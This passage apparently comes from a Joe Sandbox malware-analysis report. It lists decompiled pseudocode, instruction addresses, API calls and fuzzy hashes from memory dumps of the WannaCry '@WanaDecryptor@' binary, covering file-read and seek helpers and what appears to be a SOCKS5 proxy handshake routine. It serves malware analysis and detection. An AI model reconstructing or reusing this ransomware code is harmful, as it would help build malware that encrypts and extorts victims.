									 *((intOrPtr*)(_t101 + 0x68)) =  *((intOrPtr*)(_t100 + 0xc));
									 *((intOrPtr*)(_t101 + 0x18)) = 0;
									if( *(_t100 + 0x34) != 0) {
										_t25 = _t101 + 4; // 0x4
										 *((intOrPtr*)(_t101 + 0x24)) = 0;
										 *((intOrPtr*)(_t101 + 0x28)) = 0;
										 *((intOrPtr*)(_t101 + 0x2c)) = 0;
										_t71 = E00410380(_t25);
										_t108 = _t108 + 4;
										__eflags = _t71;
										if(_t71 == 0) {
											 *((intOrPtr*)(_t101 + 0x40)) = 1;
										}
									}
									 *((intOrPtr*)(_t101 + 0x58)) =  *((intOrPtr*)(_t100 + 0x40));
									 *((intOrPtr*)(_t101 + 0x5c)) =  *((intOrPtr*)(_t100 + 0x44));
									 *(_t101 + 0x6c) =  *(_t100 + 0x30) & 0x00000001;
									_t86 =  *(_t100 + 0x30) >> 3;
									__eflags = _t86 & 0x00000001;
									if((_t86 & 0x00000001) == 0) {
										_t65 =  *(_t100 + 0x3c) >> 0x18;
										__eflags = _t65;
										 *(_t101 + 0x80) = _t65;
									} else {
										 *(_t101 + 0x80) =  *(_t100 + 0x38) >> 8;
									}
									_t103 =  *(_t108 + 0x20);
									_t45 = _t101 + 0x70; // 0x70
									_t79 = _t45;
									asm("sbb ecx, ecx");
									 *_t45 = 0x12345678;
									 *((intOrPtr*)(_t101 + 0x74)) = 0x23456789;
									__eflags = _t103;
									 *(_t101 + 0x7c) =  ~( *(_t101 + 0x6c)) & 0x0000000c;
									 *((intOrPtr*)(_t101 + 0x78)) = 0x34567890;
									if(_t103 != 0) {
										while(1) {
											_t68 =  *_t103;
											__eflags = _t68;
											if(_t68 == 0) {
												goto L21;
											}
											E004100D0(_t79, _t68);
											_t108 = _t108 + 8;
											_t103 = _t103 + 1;
											__eflags = _t103;
											if(_t103 != 0) {
												continue;
											}
											goto L21;
										}
									}
									L21:
									_t66 =  *((intOrPtr*)(_t108 + 0x14));
									 *((intOrPtr*)(_t101 + 8)) = 0;
									_t53 = _t66 + 0x1e; // 0x345678ae
									__eflags = 0;
									 *((intOrPtr*)(_t101 + 0x3c)) =  *((intOrPtr*)(_t100 + 0x78)) + _t53;
									 *(_t100 + 0x7c) = _t101;
									return 0;
								} else {
									free(_t101);
									return 0xffffff98;
								}
							} else {
								return 0xffffff98;
							}
						} else {
							return 0xffffff99;
						}
					} else {
						return 0xffffff9a;
					}
				} else {
					return 0xffffff9a;
				}
			}

















                                  0x00411666
                                  0x0041166e
                                  0x0041167c
                                  0x0041167f
                                  0x0041168d
                                  0x00411690
                                  0x00411693
                                  0x00411698
                                  0x00411698
                                  0x004116ab
                                  0x004116b0
                                  0x004116b3
                                  0x004116b5
                                  0x004116cd
                                  0x004116cf
                                  0x004116d2
                                  0x004116d4
                                  0x004116e7
                                  0x004116ec
                                  0x004116f2
                                  0x004116f9
                                  0x004116fc
                                  0x004116fe
                                  0x00411701
                                  0x00411704
                                  0x0041171b
                                  0x00411726
                                  0x00411728
                                  0x0041172b
                                  0x00411731
                                  0x00411739
                                  0x0041173f
                                  0x00411741
                                  0x00411744
                                  0x00411747
                                  0x00411749
                                  0x0041174c
                                  0x00411750
                                  0x00411753
                                  0x00411756
                                  0x0041175b
                                  0x0041175e
                                  0x00411760
                                  0x00411762
                                  0x00411762
                                  0x00411760
                                  0x0041176c
                                  0x00411772
                                  0x0041177a
                                  0x00411780
                                  0x00411783
                                  0x00411786
                                  0x00411799
                                  0x00411799
                                  0x0041179c
                                  0x00411788
                                  0x0041178e
                                  0x0041178e
                                  0x004117a6
                                  0x004117aa
                                  0x004117aa
                                  0x004117af
                                  0x004117b1
                                  0x004117ba
                                  0x004117c1
                                  0x004117c3
                                  0x004117c6
                                  0x004117cd
                                  0x004117cf
                                  0x004117cf
                                  0x004117d2
                                  0x004117d4
                                  0x00000000
                                  0x00000000
                                  0x004117d8
                                  0x004117dd
                                  0x004117e0
                                  0x004117e0
                                  0x004117e1
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004117e1
                                  0x004117cf
                                  0x004117e3
                                  0x004117e6
                                  0x004117ea
                                  0x004117f2
                                  0x004117f6
                                  0x004117f8
                                  0x004117fb
                                  0x00411804
                                  0x00411706
                                  0x00411707
                                  0x0041171a
                                  0x0041171a
                                  0x004116d8
                                  0x004116e1
                                  0x004116e1
                                  0x004116b9
                                  0x004116c2
                                  0x004116c2
                                  0x00411683
                                  0x0041168c
                                  0x0041168c
                                  0x00411672
                                  0x0041167b
                                  0x0041167b

                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d771c3cdc0376eb06813951ce938a924a88f856aba0395dbcbb3fe4ec20f6b6d
                                  • Instruction ID: 97d1101cb4dc6e06905e0d83e2a099da94edd87715b03694c0ad860931ce0dc9
                                  • Opcode Fuzzy Hash: d771c3cdc0376eb06813951ce938a924a88f856aba0395dbcbb3fe4ec20f6b6d
                                  • Instruction Fuzzy Hash: 7F51D2B5600B018FC720DF2AE880597B7E0BF84314B544A2EEA9A83751D339F499CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410AF0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00410AF0(long _a4, signed int _a8, char _a12, char _a16) {
				long _t26;
				signed int _t28;
				int _t31;
				intOrPtr* _t34;
				intOrPtr _t36;
				signed int _t37;
				signed int _t38;
				intOrPtr _t47;
				void* _t64;
				signed int _t66;

				_t1 =  &_a16; // 0x410d5a
				_t34 =  *_t1;
				_t66 = _a8;
				_t3 =  &_a12; // 0x410d5a
				_t26 = _t66 *  *_t3;
				if( *_t34 == 0) {
					_t47 =  *((intOrPtr*)(_t34 + 0x1c));
					_t36 =  *((intOrPtr*)(_t34 + 0x18));
					if(_t47 + _t26 > _t36) {
						_t26 = _t36 - _t47;
					}
					_t17 =  &_a4; // 0x410d5a
					_t37 = _t26;
					_t64 =  *((intOrPtr*)(_t34 + 0x14)) + _t47;
					_t38 = _t37 >> 2;
					memcpy( *_t17, _t64, _t38 << 2);
					_t28 = memcpy(_t64 + _t38 + _t38, _t64, _t37 & 0x00000003);
					 *((intOrPtr*)(_t34 + 0x1c)) =  *((intOrPtr*)(_t34 + 0x1c)) + _t28;
					return _t28 / _t66;
				} else {
					_t31 = ReadFile( *(_t34 + 4), _a4, _t26,  &_a4, 0); // executed
					if(_t31 == 0) {
						 *((char*)(_t34 + 8)) = 1;
					}
					return _a4 / _t66;
				}
			}













                                  0x00410af1
                                  0x00410af1
                                  0x00410af6
                                  0x00410afe
                                  0x00410afe
                                  0x00410b05
                                  0x00410b31
                                  0x00410b34
                                  0x00410b3e
                                  0x00410b42
                                  0x00410b42
                                  0x00410b47
                                  0x00410b4b
                                  0x00410b4d
                                  0x00410b51
                                  0x00410b54
                                  0x00410b5d
                                  0x00410b68
                                  0x00410b6d
                                  0x00410b07
                                  0x00410b18
                                  0x00410b20
                                  0x00410b22
                                  0x00410b22
                                  0x00410b30
                                  0x00410b30

                                  APIs
                                  • ReadFile.KERNELBASE(000000FF,00000404,ZA,00000404,00000000,00000000,0000FFFF,00410D5A,00000000,00000404,00000001,?), ref: 00410B18
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID: ZA
                                  • API String ID: 2738559852-706706751
                                  • Opcode ID: 955d7e46bcdd16e9ef88f509da3f750024060405559589d6ed767fd5e6d7c93f
                                  • Instruction ID: 40231aa483a0e9c283400923c975ae8b8a6f0891fd27fdec0c6452f8272ca3df
                                  • Opcode Fuzzy Hash: 955d7e46bcdd16e9ef88f509da3f750024060405559589d6ed767fd5e6d7c93f
                                  • Instruction Fuzzy Hash: F401CE723042008BCB18CE18D890AABB7EAABC8610B0481ADEC498B305DA75EC15C761
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004133E6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 6COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 28%
                                  			E004133E6(void* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {

				_t1 =  &_a16; // 0x413236
				_push( *_t1);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				L0041343E(); // executed
				return __eax;
			}



                                  0x004133e6
                                  0x004133e6
                                  0x004133ea
                                  0x004133ee
                                  0x004133f2
                                  0x004133f6
                                  0x004133fb

                                  APIs
                                  • #1576.MFC42(?,?,?,62A,00413236,00000000,?,0000000A), ref: 004133F6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #1576
                                  • String ID: 62A
                                  • API String ID: 1976119259-856450375
                                  • Opcode ID: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                  • Instruction ID: 1789da96975510f8b15a36ac976bc3503c656fbbd280c19756f03076dd05f2b6
                                  • Opcode Fuzzy Hash: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                  • Instruction Fuzzy Hash: AFB008360193D6ABCB12DE91890196ABAA2BB98305F484C1DB2A50146187668568AB16
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410A50 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 76%
                                  			E00410A50(intOrPtr* _a4, long _a8, LONG* _a12) {
				intOrPtr* _t18;
				intOrPtr _t28;
				LONG* _t29;
				LONG* _t35;

				_t18 = _a4;
				_t28 =  *_t18;
				if(_t28 == 0) {
					L12:
					_t29 = _a12;
					if(_t29 != 0) {
						if(_t29 != 1) {
							if(_t29 == 2) {
								 *((intOrPtr*)(_t18 + 0x1c)) =  *((intOrPtr*)(_t18 + 0x18)) + _a8;
							}
							return 0;
						} else {
							 *((intOrPtr*)(_t18 + 0x1c)) =  *((intOrPtr*)(_t18 + 0x1c)) + _a8;
							return 0;
						}
					} else {
						 *((intOrPtr*)(_t18 + 0x1c)) = _a8;
						return 0;
					}
				} else {
					if( *((intOrPtr*)(_t18 + 1)) == 0) {
						if(_t28 == 0) {
							goto L12;
						} else {
							return 0x1d;
						}
					} else {
						_t35 = _a12;
						if(_t35 != 0) {
							if(_t35 != 1) {
								if(_t35 != 2) {
									return 0x13;
								} else {
									_push(_t35);
									goto L8;
								}
							} else {
								_push(_t35);
								L8:
								SetFilePointer( *(_t18 + 4), _a8, 0, ??); // executed
								return 0;
							}
						} else {
							SetFilePointer( *(_t18 + 4),  *((intOrPtr*)(_t18 + 0xc)) + _a8, _t35, _t35); // executed
							return 0;
						}
					}
				}
			}







                                  0x00410a50
                                  0x00410a54
                                  0x00410a58
                                  0x00410ab4
                                  0x00410ab4
                                  0x00410aba
                                  0x00410ac9
                                  0x00410add
                                  0x00410ae8
                                  0x00410ae8
                                  0x00410aed
                                  0x00410acb
                                  0x00410ad4
                                  0x00410ad9
                                  0x00410ad9
                                  0x00410abc
                                  0x00410ac0
                                  0x00410ac5
                                  0x00410ac5
                                  0x00410a5a
                                  0x00410a5f
                                  0x00410aac
                                  0x00000000
                                  0x00410aae
                                  0x00410ab3
                                  0x00410ab3
                                  0x00410a61
                                  0x00410a61
                                  0x00410a67
                                  0x00410a85
                                  0x00410a8d
                                  0x00410aa9
                                  0x00410a8f
                                  0x00410a8f
                                  0x00000000
                                  0x00410a8f
                                  0x00410a87
                                  0x00410a87
                                  0x00410a90
                                  0x00410a9b
                                  0x00410aa3
                                  0x00410aa3
                                  0x00410a69
                                  0x00410a79
                                  0x00410a81
                                  0x00410a81
                                  0x00410a67
                                  0x00410a5f

                                  APIs
                                  • SetFilePointer.KERNELBASE(?,?,00000000,00000000,00410CA4,?,00000000,00000002,00000000,?,00000000,FFFFFFFF,?), ref: 00410A79
                                  • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00410CA4,?,00000000,00000002,00000000,?,00000000,FFFFFFFF,?), ref: 00410A9B
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FilePointer
                                  • String ID:
                                  • API String ID: 973152223-0
                                  • Opcode ID: 4f7f19fd77e9e4b6ff3b3df98d071297d87b5023754c0952396fd1cd05ebf564
                                  • Instruction ID: 8c7778caab8dc427a0eff36806a54932c8fce05917786e5a19e085de530b5182
                                  • Opcode Fuzzy Hash: 4f7f19fd77e9e4b6ff3b3df98d071297d87b5023754c0952396fd1cd05ebf564
                                  • Instruction Fuzzy Hash: 3F111C742143019FCB1CCF20C8A4ABB77A2AFE8351F15C55DF08A8B361E674D8859B48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004109C0 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 87%
                                  			E004109C0(signed int __eax, intOrPtr _a4) {
				intOrPtr _t10;

				_t10 = _a4;
				if(_t10 != 0) {
					_t2 = _t10 + 0x10; // 0x683c247c
					if( *_t2 != 0) {
						_t3 = _t10 + 4; // 0x5b5e5fc0
						FindCloseChangeNotification( *_t3); // executed
					}
					_push(_t10);
					L00412C98();
					return 0;
				} else {
					return __eax | 0xffffffff;
				}
			}




                                  0x004109c1
                                  0x004109c7
                                  0x004109ce
                                  0x004109d3
                                  0x004109d5
                                  0x004109d9
                                  0x004109d9
                                  0x004109df
                                  0x004109e0
                                  0x004109eb
                                  0x004109c9
                                  0x004109cd
                                  0x004109cd

                                  APIs
                                  • FindCloseChangeNotification.KERNELBASE(5B5E5FC0,?,00410F10,?), ref: 004109D9
                                  • #825.MFC42(00410F10,?,00410F10,?), ref: 004109E0
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #825ChangeCloseFindNotification
                                  • String ID:
                                  • API String ID: 3896714138-0
                                  • Opcode ID: 90d2daed5e4983ce71ebfea6f3955ddb9dc0852fe9265e398c199eb5aa727e0d
                                  • Instruction ID: 03ad0fdb8b1fc462ccda58973351f6a4c3eefe2218a3b6158a688f411921b73e
                                  • Opcode Fuzzy Hash: 90d2daed5e4983ce71ebfea6f3955ddb9dc0852fe9265e398c199eb5aa727e0d
                                  • Instruction Fuzzy Hash: 22D02EB2818A204B8E20AF7878106CB3B942E013203094A4AF4A5D7381D264ECC183C4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D8C0 Relevance: 1.7, APIs: 1, Instructions: 178COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 75%
                                  			E0040D8C0(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a24) {
				void* _v0;
				intOrPtr _v16;
				signed int _v20;
				char _v266;
				char _v267;
				char _v268;
				char _v272;
				char _v280;
				char _v282;
				signed int _v283;
				char _v284;
				void _v287;
				void _v288;
				char _v289;
				char _v290;
				char _v291;
				char _v292;
				signed int _v296;
				char _v304;
				char _v312;
				char _v313;
				signed int _v315;
				char _v323;
				signed int _v324;
				signed int _t58;
				signed int _t65;
				signed int* _t66;
				void* _t71;
				void* _t74;
				void* _t86;
				signed int* _t87;
				void _t89;
				signed int _t111;
				signed int _t112;
				signed int _t117;
				void* _t127;
				void* _t132;
				void* _t141;
				intOrPtr _t143;

				_t58 =  *((intOrPtr*)(_v0 + 4))(_a4, _a8, _a24, _t132);
				if(_t58 != 0) {
					L24:
					return _t58 | 0xffffffff;
				} else {
					_t141 = _v0;
					_t89 = 0;
					_v272 = 0;
					if(_a8 != 0) {
						asm("repne scasb");
						_t89 = 1;
						_v272 = 1;
					}
					_v268 = 5;
					_v267 = 1;
					_v266 = 0;
					_t58 =  *((intOrPtr*)(_v0 + 0x20))(_a4,  &_v268, 3);
					if(_t58 < 0) {
						L22:
						_t143 = _a4;
						if(_t143 > 0) {
							__imp__#3(_t143); // executed
						}
						goto L24;
					} else {
						_t58 =  *((intOrPtr*)(_v0 + 0x24))(_a4,  &_v280, 2);
						if(_t58 < 0 || _v292 != 5 || _v291 == 0xff) {
							goto L22;
						} else {
							_v292 = 5;
							_v291 = 1;
							_v290 = 0;
							if(_v16 == 0) {
								_v289 = 1;
								_v288 =  *_t141;
								_t65 = _v20;
								_v283 = _t65;
								_v284 = _t65 >> 8;
								_t66 =  &_v282;
							} else {
								_v289 = 3;
								_t111 = _v296 & 0x000000ff;
								_v288 = _t89;
								_t112 = _t111 >> 2;
								memcpy( &_v287, _t141, _t112 << 2);
								_t86 = memcpy(_t141 + _t112 + _t112, _t141, _t111 & 0x00000003);
								_t117 = _v20;
								 *_t86 = _t117 >> 8;
								_t87 = _t86 + 1;
								 *_t87 = _t117;
								_t66 =  &(_t87[0]);
							}
							_t58 =  *((intOrPtr*)(_v0 + 0x20))(_a4,  &_v292, _t66 -  &_v292);
							if(_t58 < 0) {
								goto L22;
							} else {
								_t58 =  *((intOrPtr*)(_v0 + 0x24))(_a4,  &_v304, 4);
								if(_t58 < 0) {
									goto L22;
								} else {
									_t58 = _v315;
									if(_t58 != 0) {
										goto L22;
									} else {
										_t71 = _v313 - 1;
										if(_t71 == 0) {
											_t127 = _v0;
											_push(6);
											goto L19;
										} else {
											_t74 = _t71 - 2;
											if(_t74 == 0) {
												 *((intOrPtr*)(_v0 + 0x24))(_a4,  &_v312, 1);
												_t127 = _v0;
												_push((_v324 & 0x000000ff) + 2);
												_push( &_v323);
												_push(_a4);
												goto L20;
											} else {
												if(_t74 != 1) {
													L21:
													return 0;
												} else {
													_t127 = _v0;
													_push(0x12);
													L19:
													_push( &_v312);
													_push(_a4);
													L20:
													_t58 =  *((intOrPtr*)(_t127 + 0x24))();
													if(_t58 < 0) {
														goto L22;
													} else {
														goto L21;
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}










































                                  0x0040d8e9
                                  0x0040d8ee
                                  0x0040dab4
                                  0x0040dac1
                                  0x0040d8f4
                                  0x0040d8fb
                                  0x0040d902
                                  0x0040d906
                                  0x0040d90a
                                  0x0040d913
                                  0x0040d91a
                                  0x0040d91c
                                  0x0040d91c
                                  0x0040d930
                                  0x0040d935
                                  0x0040d93a
                                  0x0040d93f
                                  0x0040d944
                                  0x0040daa6
                                  0x0040daa6
                                  0x0040daab
                                  0x0040daae
                                  0x0040daae
                                  0x00000000
                                  0x0040d94a
                                  0x0040d95a
                                  0x0040d95f
                                  0x00000000
                                  0x0040d981
                                  0x0040d988
                                  0x0040d98f
                                  0x0040d994
                                  0x0040d999
                                  0x0040d9db
                                  0x0040d9e0
                                  0x0040d9e4
                                  0x0040d9ed
                                  0x0040d9f4
                                  0x0040d9f8
                                  0x0040d99b
                                  0x0040d9a8
                                  0x0040d9ad
                                  0x0040d9af
                                  0x0040d9b9
                                  0x0040d9bc
                                  0x0040d9c3
                                  0x0040d9c5
                                  0x0040d9d1
                                  0x0040d9d3
                                  0x0040d9d4
                                  0x0040d9d6
                                  0x0040d9d6
                                  0x0040da11
                                  0x0040da16
                                  0x00000000
                                  0x0040da1c
                                  0x0040da2c
                                  0x0040da31
                                  0x00000000
                                  0x0040da33
                                  0x0040da33
                                  0x0040da39
                                  0x00000000
                                  0x0040da3b
                                  0x0040da40
                                  0x0040da41
                                  0x0040da80
                                  0x0040da83
                                  0x00000000
                                  0x0040da43
                                  0x0040da43
                                  0x0040da46
                                  0x0040da62
                                  0x0040da69
                                  0x0040da78
                                  0x0040da7c
                                  0x0040da7d
                                  0x00000000
                                  0x0040da48
                                  0x0040da49
                                  0x0040da97
                                  0x0040daa3
                                  0x0040da4b
                                  0x0040da4b
                                  0x0040da4e
                                  0x0040da85
                                  0x0040da8c
                                  0x0040da8d
                                  0x0040da8e
                                  0x0040da90
                                  0x0040da95
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040da95
                                  0x0040da49
                                  0x0040da46
                                  0x0040da41
                                  0x0040da39
                                  0x0040da31
                                  0x0040da16
                                  0x0040d95f
                                  0x0040d944

                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 912c8ddbc3f5d0546dfc53f6ab7b6c2a54f01fcb62a7659748a7d661530e9815
                                  • Instruction ID: 869c219edba7a699f97af29913b463c5d84a0a7100ec88bf0606293c61a6210c
                                  • Opcode Fuzzy Hash: 912c8ddbc3f5d0546dfc53f6ab7b6c2a54f01fcb62a7659748a7d661530e9815
                                  • Instruction Fuzzy Hash: BB51803130C2869FD714CF58C840BAB7BD9AF99304F04452DF98A9B382D678D90DCBA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410A10 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00410A10(intOrPtr* _a4) {
				intOrPtr _t6;
				long _t10;
				intOrPtr* _t14;

				_t14 = _a4;
				_t6 =  *_t14;
				if(_t6 == 0) {
					L5:
					_t5 = _t14 + 0x1c; // 0x40468
					return  *_t5;
				} else {
					_t2 = _t14 + 1; // 0xffffbdf8
					if( *_t2 == 0) {
						if(_t6 == 0) {
							goto L5;
						} else {
							return 0;
						}
					} else {
						_t3 = _t14 + 4; // 0x830000ff
						_t10 = SetFilePointer( *_t3, 0, 0, 1);
						_t4 = _t14 + 0xc; // 0x14247c89
						return _t10 -  *_t4;
					}
				}
			}






                                  0x00410a11
                                  0x00410a15
                                  0x00410a19
                                  0x00410a41
                                  0x00410a41
                                  0x00410a45
                                  0x00410a1b
                                  0x00410a1b
                                  0x00410a20
                                  0x00410a3b
                                  0x00000000
                                  0x00410a3d
                                  0x00410a40
                                  0x00410a40
                                  0x00410a22
                                  0x00410a22
                                  0x00410a2c
                                  0x00410a32
                                  0x00410a38
                                  0x00410a38
                                  0x00410a20

                                  APIs
                                  • SetFilePointer.KERNELBASE(830000FF,00000000,00000000,00000001,?,00410CBB,?,00000000,?,00000000,FFFFFFFF,?), ref: 00410A2C
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FilePointer
                                  • String ID:
                                  • API String ID: 973152223-0
                                  • Opcode ID: e974794341ff6e5ab14436fbc7c1d97085009ff257f2fc2de44bcc3722d2f397
                                  • Instruction ID: 32027725d39edc4efdd6a80838e9bbfe12b8ec9337663397b441d42c78647a48
                                  • Opcode Fuzzy Hash: e974794341ff6e5ab14436fbc7c1d97085009ff257f2fc2de44bcc3722d2f397
                                  • Instruction Fuzzy Hash: CCE04F392447209BCA70CF68A814BD3BBE19F45750F18888AB8DA9BB81C2A5FCC5C744
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040C8F0 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 90%
                                  			E0040C8F0(intOrPtr* __eax, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr* _t5;
				intOrPtr* _t6;
				intOrPtr _t7;

				_t5 = __eax;
				_push(0x18); // executed
				L00412CEC(); // executed
				_t6 = _a4;
				if(_t6 == 0) {
					_t6 = __eax;
				}
				 *_t5 = _t6;
				_t7 = _a8;
				if(_t7 == 0) {
					 *((intOrPtr*)(_t5 + 4)) = _t5;
					return _t5;
				} else {
					 *((intOrPtr*)(_t5 + 4)) = _t7;
					return _t5;
				}
			}






                                  0x0040c8f0
                                  0x0040c8f0
                                  0x0040c8f2
                                  0x0040c8f7
                                  0x0040c900
                                  0x0040c902
                                  0x0040c902
                                  0x0040c904
                                  0x0040c906
                                  0x0040c90c
                                  0x0040c914
                                  0x0040c917
                                  0x0040c90e
                                  0x0040c90e
                                  0x0040c911
                                  0x0040c911

                                  APIs
                                  • #823.MFC42(00000018,0040BB62,00000000,00000000), ref: 0040C8F2
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
